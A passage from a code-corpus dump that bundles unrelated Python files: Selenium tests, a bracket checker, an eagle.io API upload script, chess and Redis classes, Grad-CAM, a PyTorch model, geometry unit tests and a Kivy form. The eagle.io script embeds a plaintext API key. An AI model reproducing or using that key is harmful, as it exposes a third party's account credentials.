link)\n page.open()\n page.add_to_backet()\n page.should_be_disappeared_success_message()\n\n\n@pytest.mark.need_review\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_cart_opened_from_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_cart_page()\n cart_page = CartPage(browser, browser.current_url)\n cart_page.should_be_cart_link()\n cart_page.should_be_empty_cart()\n cart_page.should_be_message_empty()\n","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461265258","text":"def Sequence(user):\r\n \r\n my_list = []\r\n \r\n for i in user:\r\n if i in [\"(\"]:\r\n my_list.append(i)\r\n else:\r\n \r\n if not my_list:\r\n return False\r\n current = my_list.pop()\r\n if current == '(':\r\n if i != \")\":\r\n return False\r\n\r\n if my_list:\r\n return False\r\n return True\r\n \r\n \r\n# Driver Code\r\nif __name__ == \"__main__\":\r\n user = \"()()\"\r\n\r\n if Sequence(user):\r\n print(\"Balanced\")\r\n else:\r\n print(\"Not Balanced\")\r\n\r\nif __name__ == \"__main__\":\r\n user = \"()(\"\r\n\r\n if Sequence(user):\r\n print(\"Balanced\")\r\n else:\r\n print(\"Not Balanced\")","sub_path":"4. brackets.py","file_name":"4. brackets.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40735050","text":"import httplib2\r\nimport json\r\n\r\ndef lambda_handler(json_input, context):\r\n # Set node id and value as required\r\n node_id = '@proj5' # note: customId's start with '@' \r\n node_value = json_input # generate random number between 0-100 for this example\r\n \r\n # Set api key and resource endpoint\r\n api_key = 'ZIhkkr1OU4NFJJfTtb8uu6FSQXZHz8bnHfonTIcp' # you can generate an API key from account settings\r\n api_path = 'https://api.eagle.io/api/v1/'\r\n api_resource = 'nodes/' + node_id + '/historic/now'\r\n \r\n # Build http request\r\n req_uri = api_path + api_resource\r\n req_method = 'PUT' \r\n req_headers = {'Content-Type': 'application/json', 'X-Api-Key': api_key}\r\n req_body = {'value': node_value} # optionally include timestamp and quality:\r\n # {'value': 15, 'timestamp': '2017-07-14T23:38:00Z', 'quality': 149}\r\n \r\n # Send http request and get response\r\n http = httplib2.Http()\r\n response, content = http.request(req_uri, req_method, json.dumps(req_body), req_headers)\r\n\r\n # Parse content as json\r\n data = json.loads(content)\r\n\r\n return data\r\n\r\ndata = lambda_handler(10,0)\r\nprint(data)","sub_path":"Outdated/SendToEagleIOTest.py","file_name":"SendToEagleIOTest.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340638176","text":"#pass new positions as a tuple (a, b) where a is horizontal and b is vertical\n\nclass King:\n def __init__(self, position, color, board):\n self.pos = position\n self.col = color\n self.id = \"King\"\n self.board = board\n\n def move(self, new_pos):\n #new positions are in a valid 8x8 board\n if new_pos[0] < 8 and new_pos[1] < 8:\n #hor and ver both less than 1\n if abs(self.pos[0] - new_pos[0]) <= 1 and abs(self.pos[1] - new_pos[1]) <= 1:\n #if spot is empty:\n if 
self.board[new_pos[0]][new_pos[1]] == []:\n print(\"King from\", self.pos, \"to\", new_pos)\n self.board[self.pos[0]][self.pos[1]] = []\n self.board[new_pos[0]][new_pos[1]] = self\n self.pos = new_pos\n return True\n #if spot is taken by opposing colored piece\n elif self.board[new_pos[0]][new_pos[1]] != [] and self.board[new_pos[0]][new_pos[1]].col != self.col:\n print(\"King from\", self.pos, \"takes\", self.board[new_pos[0]][new_pos[1]].id, \"on\", new_pos)\n self.board[self.pos[0]][self.pos[1]] = []\n self.board[new_pos[0]][new_pos[1]] = self\n self.pos = new_pos\n return True\n else:\n self.error(new_pos)\n else:\n self.error(new_pos)\n else:\n self.error(new_pos)\n\n def error(self, new_pos):\n print(\"The new position\", new_pos, \"is illegal. Please enter a new position.\")\n return False","sub_path":"King.py","file_name":"King.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105023189","text":"import pandas as pd\nimport fire\nfrom functools import reduce\n\ndef readIN(sample=\"BC1C\",out=\"BC1C.gcContents.txt\"):\n df1=pd.read_csv(f\"GCs/{sample}.upstream.gc.txt\",sep=\"\\t\")\n df1.columns=[\"ecc\",\"upstream\"]\n df2=pd.read_csv(f\"GCs/{sample}.ecc.gc.txt\",sep=\"\\t\")\n df2.columns=[\"ecc\",\"self\"]\n df3=pd.read_csv(f\"GCs/{sample}.downstream.gc.txt\",sep=\"\\t\")\n df3.columns=[\"ecc\",\"downstream\"]\n fin=reduce(lambda x,y:pd.merge(x,y,on=\"ecc\",how=\"outer\"), [df1,df2,df3])\n fin.to_csv(f\"GCs/{out}\",sep=\"\\t\",index=False)\n\nif __name__ == '__main__':\n fire.Fire(readIN)","sub_path":"scripts/utils/calGC.py","file_name":"calGC.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509242519","text":"class Solution:\n def get_next_stat(self, x):\n s='croak'\n return s[(s.index(x)+1)%len(s)]\n\n def minNumberOfFrogs(self, croakOfFrogs: str) -> int:\n\n if croakOfFrogs[0]!= 'c':\n return -1\n frog_idx = 1\n frog_dict = {self.get_next_stat('c'):[frog_idx]}\n ret = 0\n for item in croakOfFrogs[1:]:\n \"\"\"\n 该字符符合条件\n \"\"\"\n if item in frog_dict:\n next_key = self.get_next_stat(item)\n this_frog = frog_dict[item].pop()\n frog_dict[next_key]=frog_dict.get(next_key, [])\n frog_dict[next_key].append(this_frog)\n if not frog_dict[item]: frog_dict.pop(item)\n else:\n # 新增青蛙叫不出来\n if item!='c':\n return -1\n next_key = self.get_next_stat(item)\n frog_dict[next_key]=frog_dict.get(next_key, [])\n frog_idx += 1\n this_frog = frog_idx\n frog_dict[next_key].append(this_frog)\n for key, value in frog_dict.items():\n ret += len(value)\n if ret!=len(frog_dict.get('c',[])):\n return -1\n return ret\n\n\"\"\"\n2^2\n\n\"\"\"\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.get_next_stat(\"k\"))\n\n params = \"croakcroakcroakcroakcroakcroakcroakcroak\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==1\n\n print(s.get_next_stat(\"c\"))\n params = \"crcoakroak\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==2\n\n params = \"croakcrook\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==-1\n\n params = \"croakcroa\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==-1\n params = \"croakcroakcroakcroakcroakcroakcroakcroakk\"\n ans = s.minNumberOfFrogs(params)\n 
print(ans)","sub_path":"contests/week185/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185844853","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nfrom scipy.interpolate import spline\n\nimport matplotlib as mpl\n\nmpl.use(\"Agg\")\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\n\ndef main(input_filename, output_filename):\n\n with open(input_filename, \"r\", encoding=\"utf8\") as f:\n xml = f.read()\n\n soup = BeautifulSoup(xml, \"lxml\")\n\n y = []\n for record in soup.xml.records:\n try:\n year = record.dates.year.text.strip()\n y.append(int(year))\n except AttributeError:\n # Sometimes we end up on a NavigableString node,\n # which won't have any child nodes. Just skip it\n pass\n\n counter = Counter(y)\n\n years = sorted([int(x) for x in counter.keys()])\n count = []\n for c in sorted(counter.keys()):\n count.append(counter[c])\n total = list(np.cumsum(count))\n\n ax1 = plt.figure().add_subplot(111)\n ax1.bar(years, count, color=\"#FF8888\", label=\"Publications\")\n plt.ylabel(\"Peer-Reviewed Publications\")\n\n ynew = np.linspace(min(years), max(years), 100)\n smooth = spline(years, total, ynew)\n\n ax2 = plt.twinx()\n ax2.plot(ynew, smooth, label=\"Cumulative\")\n\n rows = [\"Publications\", \"Cumulative\"]\n table = plt.table(\n cellText=[count, total], rowLabels=rows, colLabels=years, loc=\"bottom\"\n )\n\n props = table.properties()\n cells = props[\"child_artists\"]\n for cell in cells:\n cell.set_height(0.1)\n cell.set_width(0.104)\n\n red = mpatches.Patch(color=\"#FF8888\", label=\"Publications\")\n blue = mpatches.Rectangle((0, 0), 1, 8, color=\"#1F77B4\", label=\"Cumulative\")\n plt.legend(handles=[red, blue])\n\n ax2.set_ylim(ymin=0)\n\n plt.savefig(output_filename, bbox_inches=\"tight\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Generate svg graph of TCIA papers by year\")\n\n parser.add_argument(\n 'input_file',\n help='EndNote XML export file'\n )\n parser.add_argument(\n 'output_file',\n help='Output filename, SVG'\n )\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.input_file, args.output_file)\n","sub_path":"make_graph.py","file_name":"make_graph.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273425959","text":"user_input = input(\"Hello, what is your name? \")\n\nfirst_letter = user_input[0].upper()\n\neverything_else = user_input[1:].lower()\n\ncorrect_name = first_letter + everything_else\n\nprint(\"Hello,\", correct_name)\n\n# name part finished\n\nbrand_question = input(\"What is your favorite brand? 
\")\n\n\nshoes = [{\n \"name\": \"Freeruns\",\n \"year\": 2020,\n \"brand\": \"nike\",\n \"stock\": True,\n},\n {\n \"name\": \"Air\",\n \"year\": 2018,\n \"brand\": \"jordan\",\n \"stock\": False,\n},\n {\n \"name\": \"High-Top\",\n \"year\": 2021,\n \"brand\": \"sketchers\",\n \"stock\": True,\n},\n {\n \"name\": \"oldschool\",\n \"year\": 2016,\n \"brand\": \"Vans\",\n \"stock\": False\n}\n]\n\n\n\nfor i in range(4):\n if(brand_question.lower() == shoes[i].get(\"brand\").lower() and shoes[i].get(\"stock\")):\n print(shoes[i].get(\"brand\"), \"is currently in stock!\")\n\n\n\n# found = False\n\n\n# for i in range(4):\n# if(name_question == shoes[i].get(\"name\")):\n# print(shoes[i].get(\"name\"), \"is currently in stock!\")\n# found = True\n \n \n# if(not found):\n# print(\"Sorry, piss off!\")\n\n\n# if(name_question == shoes[i].get(\"name\")):\n# print(shoes[i].get(\"name\"), \"is currently in stock!\")\n# else:\n# print(\"Sorry, piss off!\")\n\n\n\n\n","sub_path":"forwhilestock.py","file_name":"forwhilestock.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248267807","text":"\nimport os.path\nimport os\nimport socket\nimport redis\nfrom redis.exceptions import (\n ConnectionError,\n )\n\nfrom time import time\n\nclass DitchRedisHandler(object):\n\n def __init__(self,host,port,db):\n self.host= host\n self.port = port\n self.db = db\n self.redis = None\n self.isConnected = False\n self.myid = \"None\"\n\n def lprint(self,msg):\n # note: lprint was called throughout but never defined; minimal stand-in logger\n print(\"%s: %s\" % (self.myid, msg))\n\n def redisConnect(self):\n\n self.myid = 'server:' + socket.gethostname() + \":%d\" % os.getpid()\n self.lprint(\"Connect to Redis on %s:%s DB=%s\" % (self.host,self.port,self.db))\n self.redis = redis.StrictRedis(host=self.host, port=self.port, db=self.db)\n\n try:\n self.redis.ping()\n self.lprint(\"Done..\")\n self.isConnected = True\n except ConnectionError:\n # Failed to connect to redis..\n self.lprint(\"Redis connect failed..\")\n self.redis = None\n self.isConnected = False\n return False\n except Exception as e:\n # treat any other failure as not connected as well\n self.lprint(\"General exception thrown connecting to redis: %s\" % e)\n self.redis = None\n self.isConnected = False\n return False\n\n return True\n\n def redisDisconnect(self):\n # We are ending now.. deregister with redis\n self.hdel(self.myid)\n self.srem('servers',self.myid)\n self.lprint(\"Deregistered from redis server.\")\n\n def hset(self,hash,key,value):\n\n try:\n self.redis.hset(hash,key,value)\n except:\n # Failed.. perhaps redis is down?\n self.isConnected = False\n return False\n return True\n\n def hget(self,hash,key):\n\n try:\n return self.redis.hget(hash,key)\n except:\n # Failed.. perhaps redis is down?\n self.isConnected = False\n return None\n\n def hdel(self,key):\n\n try:\n # DEL the whole hash key; redis-py hdel() requires hash field names\n self.redis.delete(key)\n except:\n self.isConnected = False\n\n def sadd(self,setname,value):\n\n try:\n self.redis.sadd(setname,value)\n except:\n self.isConnected = False\n\n def srem(self,setname,value):\n\n try:\n self.redis.srem(setname,value)\n except:\n # Failed.. 
perhaps redis is down?\n self.isConnected = False\n return False\n return True\n\n def lpush(self,listname,value):\n\n try:\n self.redis.lpush(listname,value)\n except:\n self.isConnected = False\n\n def rpop(self,listname):\n\n try:\n return self.redis.rpop(listname)\n except:\n self.isConnected = False\n return None\n\n def brpop(self,listname,timeout):\n\n try:\n return self.redis.brpop(listname,timeout)\n except:\n self.isConnected = False\n return None\n\n def exists(self,key):\n\n try:\n return self.redis.exists(key)\n except:\n self.isConnected = False\n return False\n\n","sub_path":"webapp/ditch/ditchmon/Ditch/DitchRedisHandler.py","file_name":"DitchRedisHandler.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18151555","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass CamExtractor(object):\n \"\"\" Extractor for GradCam\"\"\"\n\n model: nn.Module\n target_layer: int\n gradients: torch.Tensor\n do_explicit_flatten: bool\n verbose: bool\n\n def __init__(self, model: nn.Module, target_layer: int,\n do_explicit_flatten: bool = False,\n verbose: bool = True) -> None:\n self.model = model\n self.target_layer = target_layer\n self.gradients = None\n self.do_explicit_flatten = do_explicit_flatten\n self.verbose = verbose\n\n def save_gradient(self, grad: torch.Tensor) -> None:\n \"\"\" save backward gradient to member variable \"\"\"\n self.gradients = grad\n\n def forward_pass(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Does a forward pass and hooks the function at given layer\n \"\"\"\n conv_output = None\n\n module_num = len(list(self.model.children()))\n for module_pos, module in enumerate(list(self.model.children())):\n if self.do_explicit_flatten and module_pos == module_num - 1:\n x = x.view(x.size(0), -1)\n\n x = module(x) # Forward\n if int(module_pos) == self.target_layer:\n if self.verbose:\n print('layer to hook: \\n{}'.format(module))\n\n x.register_hook(self.save_gradient)\n conv_output = x # Save the convolution output on that layer\n\n return conv_output, x\n\n\nclass GradCam(object):\n \"\"\"\n Grad-Cam\n Produces class activation map\n https://arxiv.org/abs/1610.02391\n https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/gradcam.py\n \"\"\"\n\n model: nn.Module\n extractor: CamExtractor\n verbose: bool\n\n def __init__(self, model: nn.Module, target_layer: int,\n device: torch.device=None,\n scanner_args: dict = {},\n verbose: bool = True) -> None:\n self.device = device\n if device is None: # Not Specified\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu')\n\n self.model = model.to(self.device)\n for param in self.model.parameters():\n param.requires_grad = True\n self.model.eval()\n # Define extractor\n scanner_args['verbose'] = verbose\n self.extractor = CamExtractor(self.model, target_layer, **scanner_args)\n\n def generate_cam(self,\n input_image: torch.Tensor,\n target_class: int\n ) -> np.ndarray:\n \"\"\" generate gradcam heatmap \"\"\"\n\n # Full forward pass\n # conv_output is the output of convolutions as specified layer\n # model_output is the final output of the model (1, num_classes)\n conv_output, model_output = self.extractor.forward_pass(input_image)\n if target_class is None:\n # set argmax to target class in case not specified\n target_class = 
np.argmax(model_output.cpu().data.numpy())\n\n # Target for backprop\n one_hot_output = torch.FloatTensor(\n 1, model_output.size()[-1]).to(self.device).zero_()\n one_hot_output[0][target_class] = 1\n\n # Zero grads\n self.model.zero_grad()\n\n # Backward pass with specified target\n model_output.backward(gradient=one_hot_output, retain_graph=True)\n\n # Get hooked gradients\n guided_gradients = self.extractor.gradients.cpu().data.numpy()[0]\n\n # Get convolution outputs\n target = conv_output.cpu().data.numpy()[0]\n\n # Get weights from gradients by taking averages\n weights = np.mean(guided_gradients, axis=(1, 2))\n\n # Create empty numpy array for cam\n cam: np.ndarray = np.ones(target.shape[1:], dtype=np.float32)\n\n # Multiply each weight with its conv output and sum\n for i, weight in enumerate(weights):\n cam += weight * target[i, :, :]\n\n cam = cv2.resize(cam, (224, 224))\n cam = np.maximum(cam, 0)\n cam = (cam - np.min(cam)) / (np.max(cam) -\n np.min(cam)) # Normalize between 0-1\n cam = np.uint8(cam * 255) # Scale between 0-255 to visualize\n return cam\n","sub_path":"cnn_visualization/gradcam/gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558570866","text":"# check letter by letter the correspondence with the code\ndef controlla_parola(strutt,parola,codice):\n segnaposto=0\n for lettera in parola:\n for x,y in strutt.items():\n if check(parola,lettera,segnaposto,codice,x,y):\n return False\n segnaposto=parola.index(lettera,segnaposto)+1\n return True\n\ndef check(parola,lettera,segnaposto,codice,x,y):\n i=parola.index(lettera,segnaposto)\n z=codice[i]\n if (x!= lettera and y== z) or (x == lettera and y != z):\n return True\n return False\n\n# prepare the word for checking\ndef elabora_parola(parola,codice):\n parola=parola[:-1]\n strutt={}\n for lettera in parola:\n if lettera not in strutt:\n strutt[lettera]=codice[parola.index(lettera)]\n return strutt,parola \n \n# main function\ndef decod(pfile, codice):\n \n parole=leggi_file(pfile)\n\n insieme=set()\n l=len(codice)+1\n \n for parola in parole:\n if len(parola)==l:\n strutt,parola=elabora_parola(parola,codice)\n if controlla_parola(strutt,parola,codice):\n insieme.add(parola)\n \n return insieme\n\n# returns a list of words\ndef leggi_file(pfile):\n file = open(pfile, \"r\")\n parole=file.readlines()\n file.close()\n return parole\n","sub_path":"students/1806198/homework02/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213163256","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Two_FC_layer(torch.nn.Module):\n def __init__(self, rgb_dim=2048, OF_dim = 2048, reduced_dim=128, fc_dim = 64, num_classes=7):\n super(Two_FC_layer, self).__init__()\n self.reduced_rgb = nn.Linear(rgb_dim, reduced_dim, bias=False)\n self.reduced_OF = nn.Linear(OF_dim, reduced_dim, bias=False)\n self.rgb = rgb_dim\n self.OF = OF_dim\n\n self.fc1 = nn.Linear(2*reduced_dim, fc_dim, bias=False)\n self.fc2 = nn.Linear(fc_dim, fc_dim, bias=False)\n self.class_dim = nn.Linear(fc_dim, out_features=num_classes, bias=False) # output\n\n def forward(self, x):\n temp = torch.cat((self.reduced_rgb(x[:, 0:self.rgb]), self.reduced_OF(x[:, self.rgb : (self.rgb+self.OF)])), dim=1)\n out = self.class_dim(self.fc2(self.fc1(temp)))\n return 
out\n\n\n\n\n","sub_path":"RGB_OF/2FC/two_FC_layer_model_RGB_OF.py","file_name":"two_FC_layer_model_RGB_OF.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63753312","text":"import os\nimport unittest\nfrom unittest import mock\n\nfrom Geometria_.model.Geometria import Geometria as g\nfrom Geometria_.view.View import View\nfrom Geometria_ import main\n\nclass TestGeometria(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n print('setUpClass() -> OK')\n self.obj_geometria_1 = g(1, 2, 3)\n self.obj_geometria_2 = g(12, -1, 100)\n self.obj_geometria_3 = g(1.2, -2.2, 33)\n\n #Data definition for test cases\n def setUp(self):\n print('SetUp() -> OK')\n self.r = 0\n self.r_a = []\n self.obj_geometria_1 = g(1, 2, 3)\n self.obj_geometria_2 = g(12, -1, 100)\n self.obj_geometria_3 = g(1.2, -2.2, 33)\n self.obj_geometria_4 = g(1, 2, 3)\n\n self.valores_a = [1, 2, 3, 4, 5, 6, 7, 8]\n self.valores_b = [2, 3, 5, 6, 7, 2, 6, 1]\n self.valores_sw = [range(1,8)]\n\n self.figuras = {1 : \"Cuadrado\",2 : \"Circulo\",3 : \"Triangulo\",4 : \"Rectangulo\",5 : \"Pentagono\",6 : \"Rombo\",7 : \"Romboide\",8 : \"Trapecio\"}\n\n ###Test cases for each geometric form of the model\n def test_areaCuadrado(self):\n r = g.areaCuadrado(self,self.obj_geometria_1.a)\n #r_2 = g.areaCuadrado(self,self.obj_geometria_3.b)\n\n self.assertEqual(r, self.obj_geometria_1.a * self.obj_geometria_1.a)\n #self.assertEqual(r_2, self.obj_geometria_3.b * self.obj_geometria_3.b)\n print('test_areaCuadrado() - > OK')\n\n\n def test_areaCirculo(self):\n PI = 3.1416\n #Calculamos de forma manual el area para evaluarlo\n aux_res = [PI * pow(n,2) for n in self.valores_a]\n r_a = [g.areaCirculo(self,n) for n in self.valores_a]\n self.assertEqual(r_a,aux_res)\n\n print('test_areaCirculo() - > OK')\n\n def test_areaTiangulo(self):\n r = g.areaTiangulo(self,self.obj_geometria_1.a,self.obj_geometria_1.b)\n self.assertEqual(r, (self.obj_geometria_1.a * self.obj_geometria_1.b) / 2.0 )\n print('test_areaTiangulo() - > OK')\n\n\n def test_areaRectangulo(self):\n aux_res = [n[0] * n[1] for n in zip(self.valores_a,self.valores_b )]\n r_a = [g.areaRectangulo(self,n[0],n[1] ) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRectangulo() - > OK')\n\n def test_areaPentagono(self):\n aux_res = [(n[0] * n[1]) / 2.0 for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaPentagono(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaPentagono() - > OK')\n\n def test_areaRombo(self):\n aux_res = [(n[0] * n[1]) / 2.0 for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaRombo(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRombo() - > OK')\n\n\n def test_areaRomboide(self):\n aux_res = [(n[0] * n[1]) for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaRomboide(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRomboide() - > OK')\n\n\n def test_areaTrapecio(self):\n aux_res = [ ( ( ( n[0] + n[1]) / 2.0) * self.obj_geometria_2.a ) for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaTrapecio(self, n[0], n[1],self.obj_geometria_2.a) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaTrapecio() - > OK')\n\n def test_init(self):\n r = g(1, 2, 3)\n 
self.assertEqual(r.a, self.obj_geometria_1.a)\n print('test_init() - > OK')\n\n def test_figuraname(self):\n\n for n in self.figuras:\n self.obj_geometria_3.set_figuraName(n)\n self.assertEqual(self.obj_geometria_3.figuraName, self.figuras[n])\n print('test_figuraname_{0}() - > OK'.format(self.figuras[n]))\n print('test_figuraname() - > OK')\n\n def test_switch(self):\n for n in self.valores_sw:\n self.assertEqual(self.obj_geometria_4.switch(n), self.obj_geometria_1.switch(n))\n print('test_switch_Opcion Menu :: {0} () - > OK'.format(n))\n\n #Test view file falidation\n def testView(self):\n v = View()\n result = v.select(self.obj_geometria_1)\n self.assertEqual(result, 0)\n\n def testMain(self):\n result = os.system(\"python main.py\")\n self.assertEqual(result, 0)\n\n #Release Resources\n def tearDown(self):\n del self.r\n del self.r_a\n del self.obj_geometria_1\n del self.obj_geometria_2\n del self.obj_geometria_3\n print('tearDown() - > OK')\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"2021-online-py-02-unittest-master/Geometria_/test/TestGeometria.py","file_name":"TestGeometria.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46563197","text":"import kivy\n\nfrom kivy.app import App\nfrom kivy.uix.tabbedpanel import TabbedPanelHeader\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.dropdown import DropDown\nfrom kivy.uix.slider import Slider\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\n\nclass Proforma(App):\n\tdef operations(click):\t\n\t\tpass\n\t\t\n\tdef build(self):\n\t#*******ROOTWIDGET*******\n\t\tlayout = GridLayout(rows=2)\t\t\n\t#*******SUB-WIDGETS*******\n\t\tlayoutTop = GridLayout(cols=3,rows=1)#SUB-WIDGET-1\n\t\tlayoutTop.size_hint = (1, 0.1)\n\t\tlayoutMid = FloatLayout()#SUB-WIDGET-2\n\t\tlayoutMid.size_hint = (1, 1)\n\t\t\n\t#*******CONTENT-OF-SUB-WIDGET-1*******\t\n\t\tmenubtn = Button(text='Menu')\n\t\tmenubtn.size_hint = (0.1, 0.1)\n\t\thead = Label(text='PRO-FORMA',size_hint_y = None,size_hint_x=None, width=200)\n\t\thead.size_hint = (0.8, 0.1)\n\t\tbackbtn = Button(text='Drop')\n\t\tbackbtn.size_hint = (0.1, 0.1)\n\t\t#dropbtn = Button()\n\t#*******CONTENT-OF-SUB-WIDGET-2*******\n\t\ttp_panel = TabbedPanel()\n\t\ttp_panel.default_tab_text = \"Global News\"\t\n\t\t\n\t\tlayoutnews = GridLayout(rows=2)\n\t\tupperlayout = GridLayout(cols=3, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 50, size_hint_x=1)\n\t\tlowerlayout = GridLayout(row=1)\n\t\t\n\t\tupperlayout.add_widget(Button(text='S', size_hint=(0.1, None)))\n\t\tupperlayout.add_widget(TextInput(text='search', size_hint=(0.8, None), focus=True, multiline=False))\n\t\tupperlayout.add_widget(Button(text='settings', size_hint=(0.1, None)))\n\t\t\n\t\tlowerlayout.add_widget(Label())\n\t\t\n\t\tlayoutnews.add_widget(upperlayout)\n\t\tlayoutnews.add_widget(lowerlayout)\n\t\ttp_panel.default_tab_content = layoutnews\n\t\t\n\t\t#*******TAB1*******\t\n\t\tth_tab1 = TabbedPanelHeader(text = 'Pro-Forma')\n\t\t#*******SCROLLABILITY-WIDGET*******\n\t\tscroll = ScrollView(size_hint=(1, None), size=(800, 1000))\n\t\t\n\t\tmainlayout = GridLayout(cols = 1, spacing = 10, size_hint_y=None, 
size_hint_x=1)\n\t\tmainlayout.bind(minimum_height=mainlayout.setter('height'))\n\t\t#*******LAYOUT-FOR-PROPERTY-INFORMATION*******\n\t\tlayouttab1 = GridLayout(cols=2,rows=6, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 250, size_hint_x=1)\n\t\t#*******LAYOUT-FOR-UNIT-MIX*******\n\t\tlayoutmix = GridLayout(cols=4, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40,size_hint_y=None, height = 80)\n\t\t#*******LAYOUT-FOR-EXPENSES*******\n\t\tlayoutexpense = GridLayout(cols=2, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 960)\n\t\t#*******LAYOUT-FOR-ACCOUNTS*******\n\t\tlayoutacc = GridLayout(cols=2, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40,size_hint_y=None, height = 240)\n\t\t#*******CONTENT1*****\n\t\tmainlayout.add_widget(Label(text='Property Information',size_hint=(None, 1)))\n\t\t#*******CONTENT2*******\n\t\tlayouttab1.add_widget(Label(text= 'Property Name', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Property Address', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Town/City', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Asking Price', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Total Units', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Square Footage', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, 